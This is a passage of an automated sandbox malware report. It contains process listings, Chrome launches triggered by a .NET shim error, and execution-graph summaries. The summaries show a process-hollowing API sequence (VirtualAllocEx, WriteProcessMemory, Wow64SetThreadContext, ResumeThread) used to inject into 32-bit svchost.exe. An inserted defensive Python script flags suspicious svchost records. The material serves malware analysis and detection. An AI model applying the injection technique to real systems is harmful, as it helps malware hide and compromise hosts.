                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:123
                                                                                                                                                                                            Start time:12:44:58
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:124
                                                                                                                                                                                            Start time:12:44:59
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=1992,i,15123479563739650555,17542146906633038749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:125
                                                                                                                                                                                            Start time:12:44:59
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:126
                                                                                                                                                                                            Start time:12:45:02
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:127
                                                                                                                                                                                            Start time:12:45:02
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1596 --field-trial-handle=2032,i,2098739127948043686,10317841462462024608,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:128
                                                                                                                                                                                            Start time:12:45:04
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:129
                                                                                                                                                                                            Start time:12:45:05
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,8929845415192330188,781615668034862370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:130
                                                                                                                                                                                            Start time:12:45:05
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x60000
                                                                                                                                                                                            File size:46'504 bytes
                                                                                                                                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:131
Start time:12:45:11
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:132
Start time:12:45:12
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1960,i,9677392010693155346,11350815433485431755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:133
Start time:12:45:17
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:134
Start time:12:45:17
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1968,i,10908976342037239078,6657148638705883583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:135
Start time:12:45:17
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:136
Start time:12:45:20
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:137
Start time:12:45:20
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,15324472771725808384,11056097287078458784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:138
Start time:12:45:23
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:139
Start time:12:45:23
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,1428648053043398560,3532581574471474972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff76e190000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:140
Start time:12:45:23
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
File size:46'504 bytes
MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true
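
The two svchost.exe records above (Target IDs 135 and 140) and the Chrome launches around them are the part of this listing worth scripting a check for. The Python below is an added example, not code from the Joe Sandbox report: it parses records in the report's Key:Value layout and applies two heuristics. First, in the spirit of the "Suspect Svchost Activity" Sigma hit in the report summary, it flags an svchost.exe started with a bare command line (no -k service group), which is how both injected copies appear here, and notes when it is the 32-bit copy under SysWOW64. Second, it recognises a browser opened on the go.microsoft.com fwlink with o1=SHIM_NOVERSION_FOUND and pulls out its processName parameter. My reading of that link, which the report itself does not spell out, is that it is the one the .NET startup shim offers when a managed image asks for a runtime version the host lacks, so processName=svchost.exe is consistent with a managed payload having been run inside svchost.exe. The sample records are constructed in the report's layout (records 135, 136 and 137 copied from the listing with long Chrome switches trimmed; record 999 is a hypothetical, correctly started service host used as a benign control), and the function names are my own.

```python
# Added example, not code from the Joe Sandbox report: parse "Target ID"
# process records in the report's Key:Value layout and flag two things a
# triager looks for in this listing.
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the report's own layout: records 135, 136 and 137 are
# copied from the listing (long Chrome switches trimmed); record 999 is a
# hypothetical, correctly started service host used as a benign control.
SAMPLE_RECORDS = r"""Target ID:135
Start time:12:45:17
Start date:04/01/2025
Path:C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):true
Commandline:svchost.exe
Imagebase:0x60000
Has exited:true

Target ID:136
Start time:12:45:20
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase:0x7ff76e190000
Has exited:false

Target ID:137
Start time:12:45:20
Start date:04/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
Imagebase:0x7ff76e190000
Has exited:false

Target ID:999
Start time:12:00:00
Start date:04/01/2025
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:0x7ff700000000
Has exited:false
"""

FWLINK = re.compile(r"https?://go\.microsoft\.com/fwlink/\S*")


def parse_records(text):
    """One dict per blank-line-separated record. Split each line on the
    first colon only: times, drive letters and URLs contain colons too."""
    records = []
    for block in re.split(r"\n[ \t]*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def svchost_findings(rec):
    """Reasons an svchost.exe record looks like an injected copy rather than a
    real service host (same idea as the report's 'Suspect Svchost Activity'
    Sigma hit). An empty list means nothing odd by these checks."""
    if not rec.get("Path", "").lower().endswith("\\svchost.exe"):
        return []
    reasons = []
    args = rec.get("Commandline", "").lower().split()
    if "-k" not in args:
        reasons.append("started without a -k service group")
    if rec.get("Wow64 process (32bit)", "").lower() == "true":
        reasons.append("32-bit copy running under SysWOW64")
    return reasons


def dotnet_shim_launch(rec):
    """Return the fwlink query parameters if this record is a browser opened on
    the .NET shim's SHIM_NOVERSION_FOUND link, else None. processName names
    the process that hosted the shim when the runtime lookup failed."""
    m = FWLINK.search(rec.get("Commandline", ""))
    if not m:
        return None
    params = {k: v[0] for k, v in parse_qs(urlsplit(m.group(0)).query).items()}
    return params if params.get("o1") == "SHIM_NOVERSION_FOUND" else None


def triage(text):
    """Map Target ID -> svchost findings, and Target ID -> processName for
    each shim-triggered browser launch."""
    suspect, shim = {}, {}
    for rec in parse_records(text):
        tid = rec.get("Target ID", "?")
        reasons = svchost_findings(rec)
        if reasons:
            suspect[tid] = reasons
        params = dotnet_shim_launch(rec)
        if params:
            shim[tid] = params.get("processName")
    return {"suspect_svchost": suspect, "shim_launches": shim}


if __name__ == "__main__":
    for section, hits in triage(SAMPLE_RECORDS).items():
        print(section)
        for tid, detail in hits.items():
            print(f"  Target ID {tid}: {detail}")
```

Run against the full listing, the script reports 135 and 140 as bare svchost.exe copies and pairs every --start-maximized Chrome launch with processName=svchost.exe; the utility-type Chrome children carry no fwlink and are ignored. Parent process and -k arguments are the two fields the real Sigma rule leans on, and this report's per-process records only give the second, so treat the result as a triage pointer rather than a verdict.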

                                                                                                                                                                                            Target ID:141
                                                                                                                                                                                            Start time:12:45:28
                                                                                                                                                                                            Start date:04/01/2025
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:false

Target ID: 142
Start time: 12:45:32
Start date: 04/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,3981841079913460613,3962020599342444513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 143
Start time: 12:45:45
Start date: 04/01/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Imagebase: 0x7ff76e190000
File size: 3'242'272 bytes
MD5 hash: 45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false


Execution Graph

Execution Coverage: 9.1%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 1.2%
Total number of Nodes: 249
Total number of Limit Nodes: 9
execution_graph (node/edge listing of the rendered graph omitted). Windows API calls referenced by graph nodes: CreateIconFromResourceEx, PostMessageW, DuplicateHandle, CreateActCtxA, GetModuleHandleW, ResumeThread, Wow64SetThreadContext, VirtualAllocEx, WriteProcessMemory, CreateProcessA, ReadProcessMemory, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId
Strings
Memory Dump Source
• Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID: (o^q$(o^q$,bq$,bq$Hbq
• API String ID: 0-3486158592
• Opcode ID: f01c564ff6380b5fbc79cf30cdec80f459e330f58cebaebcadf132a81d00c163
• Instruction ID: 38269f21f96efc2463c3e39039001fe1ef8ba8d1ae15d9e34c65e054af5af1dd
• Opcode Fuzzy Hash: f01c564ff6380b5fbc79cf30cdec80f459e330f58cebaebcadf132a81d00c163
• Instruction Fuzzy Hash: 79524D35B001159FCB18DF69C898AAEBBB6BFC8750B158169E815DB374DB31EC42CB90

Control-flow Graph

control_flow_graph for the function at 4f198cc (executed/not-executed node colouring and the node/edge listing of the rendered graph omitted)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID: Hbq$Hbq$Hbq$Hbq$Hbq
• API String ID: 0-1677660839
• Opcode ID: b8a01fcacc513a182ac45f87cc69bc08ffb222a0dba41c5ad8bffd0a1f2e2bf1
• Instruction ID: b9cc322a40aae270bdc048ed9e36375e624e0647c2701be7a8df400b5928cd7b
• Opcode Fuzzy Hash: b8a01fcacc513a182ac45f87cc69bc08ffb222a0dba41c5ad8bffd0a1f2e2bf1
• Instruction Fuzzy Hash: CE326170E00218CFDB54DFB9C85579EBBF2AF84300F14856AD449AB3A5DB34AD46CB91

Control-flow Graph

control_flow_graph for the function at 4f16efe (executed/not-executed node colouring and the node/edge listing of the rendered graph omitted)
Strings
Memory Dump Source
• Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID: D
• API String ID: 0-2746444292
• Opcode ID: 203e449d7cb55b7a589c8752e6355e1c02b0bb37028ecd3ba4445750876ec2c0
• Instruction ID: 98961f783f175299bf5726a7effff875237dd8334983c3d2f9846f309d389cc2
• Opcode Fuzzy Hash: 203e449d7cb55b7a589c8752e6355e1c02b0bb37028ecd3ba4445750876ec2c0
• Instruction Fuzzy Hash: 77620974A102288FDB54DF28D895AEDB7B1FB89310F1091E5D509ABB64DB30AE87CF50
Memory Dump Source
• Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3eda5217fec2157f6c4508ada6afa083a4e49ffb8f58bf209856a7f1926ef7a
• Instruction ID: 7bd85384740e186d4e77c83ace6cc43e9e66f8e09fa5a8e65d5b490cd051ecb0
• Opcode Fuzzy Hash: e3eda5217fec2157f6c4508ada6afa083a4e49ffb8f58bf209856a7f1926ef7a
• Instruction Fuzzy Hash: 69F11571E0024ACFDF15DFA8D8806ADFBB2FF84300F1685A5D451EB2A6DB34A846C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: be73287e8089a0e6dc10092135d8b5403ca388575992ceef417f51afa6209967
                                                                                                                                                                                              • Instruction ID: a98dfde23aaa9f3102b2f6f53c1c99d5a0614d85d54356ef4cbee5c796db1496
                                                                                                                                                                                              • Opcode Fuzzy Hash: be73287e8089a0e6dc10092135d8b5403ca388575992ceef417f51afa6209967
                                                                                                                                                                                              • Instruction Fuzzy Hash: DFB14D75D01258CFDF15CFA5D880B9DBBF2AF84304F1481AAD449AB265EB70E986CF50
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 922083505b7e04f61d76673a2a330ac8aa8068c833395f25666d58208fc1ab60
                                                                                                                                                                                              • Instruction ID: ebb949b1195d025ac8dd230a8d15937b73e8c80f8db97cfcf29d4bff3bc2b0b4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 922083505b7e04f61d76673a2a330ac8aa8068c833395f25666d58208fc1ab60
                                                                                                                                                                                              • Instruction Fuzzy Hash: 18B14C75E01258CFDF15CFA5D880B9DBBF2AF84304F14816AD449AB265E770E946CF50

Control-flow Graph
control_flow_graph 718 dfda60-dfdaef GetCurrentProcess 722 dfdaf8-dfdb2c GetCurrentThread 718->722 723 dfdaf1-dfdaf7 718->723 724 dfdb2e-dfdb34 722->724 725 dfdb35-dfdb69 GetCurrentProcess 722->725 723->722 724->725 727 dfdb6b-dfdb71 725->727 728 dfdb72-dfdb8a 725->728 727->728 730 dfdb93-dfdbc2 GetCurrentThreadId 728->730 732 dfdbcb-dfdc2d 730->732 733 dfdbc4-dfdbca 730->733 733->732
APIs
• GetCurrentProcess.KERNEL32 ref: 00DFDADE
• GetCurrentThread.KERNEL32 ref: 00DFDB1B
• GetCurrentProcess.KERNEL32 ref: 00DFDB58
• GetCurrentThreadId.KERNEL32 ref: 00DFDBB1
Memory Dump Source
• Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 901fb0748017f8e6fc4e3421ebcf8c1eaebee86516e30d5ac45cbab83bdb1768
• Instruction ID: ac5cbd0435ad879e68333b5f132eac3202eedd0abc1a782619de1ed3093c1f1d
• Opcode Fuzzy Hash: 901fb0748017f8e6fc4e3421ebcf8c1eaebee86516e30d5ac45cbab83bdb1768
• Instruction Fuzzy Hash: FB5146B4900249CFDB14DFAAD548BAEBBF2AF48304F24C469D119A7360D7749944CF65

Control-flow Graph
control_flow_graph 876 54d9ba8-54d9bcb 877 54d9bcd 876->877 878 54d9bd2-54d9c0d 876->878 877->878 879 54d9c20-54d9c3f 878->879 882 54d9c68-54d9cd8 879->882 883 54d9cf7-54d9d04 879->883 913 54d9cda call 54daabe 882->913 914 54d9cda call 54dad3a 882->914 915 54d9cda call 54dabb6 882->915 916 54d9cda call 54dac01 882->916 917 54d9cda call 54daac0 882->917 886 54d9d0d-54d9d14 883->886 888 54d9d4f-54d9d68 886->888 889 54d9d40-54d9daf 886->889 895 54d9d81-54d9d8e 888->895 896 54d9d90-54d9da7 888->896 894 54d9ceb-54d9cef 889->894 898 54d9d6a-54d9d7f 894->898 899 54d9cf1-54d9cf2 894->899 895->889 896->895 898->895 905 54d9d16-54d9d3b 898->905 899->882 901 54d9ce0-54d9cea 905->889 907 54d9c44-54d9c5e call 54d9b50 905->907 910 54d9c0f-54d9c14 907->910 911 54d9c60-54d9c66 907->911 910->894 912 54d9c1a-54d9c1b 910->912 911->882 911->910 912->879 912->894 913->901 914->901 915->901 916->901 917->901
Strings
Memory Dump Source
• Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID: Te^q$Te^q
• API String ID: 0-3743469327
• Opcode ID: ccad3892a8b347a659abd93fd99572b4c6af5458b631ac628d3fe5faf040162d
